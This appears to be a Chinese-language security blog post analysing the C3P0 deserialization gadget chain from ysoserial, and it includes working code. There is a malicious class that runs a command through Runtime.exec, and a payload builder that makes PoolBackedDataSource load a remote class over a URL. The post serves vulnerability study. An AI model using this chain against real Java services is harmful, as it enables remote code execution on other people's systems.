分析
首先是阅读神器ysoserial
是怎样调用c3p0
的
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/C3P0.java
1
2
| PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));
|
调用了com.mchange.v2.c3p0.PoolBackedDataSource
,并把connectionPoolDataSource
属性设置为PoolSource
寻找connectionPoolDataSource
属性,最终在父类的父类中找到
那就重点看看这个类是怎样处理writeObject
和readObject
因为PoolSource
没有继承Serializable
接口,所以会进入箭头所指的函数
将Reference
对象经过ReferenceSerialized
包装写入流中
因为用到了Referenceable
接口的函数,所以PoolSource
要同时实现ConnectionPoolDataSource
和Referenceable
writeObject
的操作就是这样,接下来看看readObject
因为PoolSource
经过了ReferenceIndirector
的包装,跟进ReferenceIndirector.getObject()
继续跟进ReferenceableUtils.referenceToObject()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| public static Object referenceToObject(Reference var0, Name var1, Context var2, Hashtable var3) throws NamingException {
try {
String var4 = var0.getFactoryClassName();
String var11 = var0.getFactoryClassLocation();
ClassLoader var6 = Thread.currentThread().getContextClassLoader();
if (var6 == null) {
var6 = ReferenceableUtils.class.getClassLoader();
}
Object var7;
if (var11 == null) {
var7 = var6;
} else {
URL var8 = new URL(var11);
var7 = new URLClassLoader(new URL[]{var8}, var6);
}
Class var12 = Class.forName(var4, true, (ClassLoader)var7);
ObjectFactory var9 = (ObjectFactory)var12.newInstance();
return var9.getObjectInstance(var0, var1, var2, var3);
} catch (Exception var10) {
if (logger.isLoggable(MLevel.FINE)) {
logger.log(MLevel.FINE, "Could not resolve Reference to Object!", var10);
}
NamingException var5 = new NamingException("Could not resolve Reference to Object!");
var5.setRootCause(var10);
throw var5;
}
}
|
可以发现URLClassLoader
构造了一个从远程加载类的加载器,并且使用Class.forName
来利用这个加载器从远程加载这个类
回到PoolSource
因为实现了Referenceable
,所以就能通过getReference
函数来实现控制传进ReferenceableUtils.referenceToObject()
的参数,也就是能够从远程地址加载恶意类了
复现
ysoserial
的构造方法有点高级,为了学习,我不用ysoserial
的构造payload的方法
首先编译一个恶意类,放到web目录下
1
2
3
4
5
6
7
8
9
| public class Exploit {
public Exploit(){
try {
Runtime.getRuntime().exec("calc");
} catch (Exception e) {
}
}
}
|
然后构造payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| import java.io.*;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import com.mchange.v2.c3p0.PoolBackedDataSource;
public class Test {
public static void main(String []args) throws Exception {
PoolBackedDataSource p = new PoolBackedDataSource();
p.setConnectionPoolDataSource(new PoolSource("Exploit", "http://127.0.0.1:8080/"));
// serialize
FileOutputStream fos=new FileOutputStream("object");
ObjectOutputStream os=new ObjectOutputStream(fos);
os.writeObject(p);
os.close();
FileInputStream fis=new FileInputStream("object");
ObjectInputStream ois=new ObjectInputStream(fis);
// deserialize
String obj2=(String)ois.readObject();
System.out.println(obj2);
}
private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {
private String className;
private String url;
public PoolSource ( String className, String url ) {
this.className = className;
this.url = url;
}
public Reference getReference () throws NamingException {
return new Reference("exploit", this.className, this.url);
}
public PrintWriter getLogWriter () throws SQLException {return null;}
public void setLogWriter ( PrintWriter out ) throws SQLException {}
public void setLoginTimeout ( int seconds ) throws SQLException {}
public int getLoginTimeout () throws SQLException {return 0;}
public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
public PooledConnection getPooledConnection () throws SQLException {return null;}
public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}
}
}
|
运行后就能执行calc
,弹出计算器

参考
https://blog.csdn.net/fnmsd/article/details/88959428
https://paper.seebug.org/312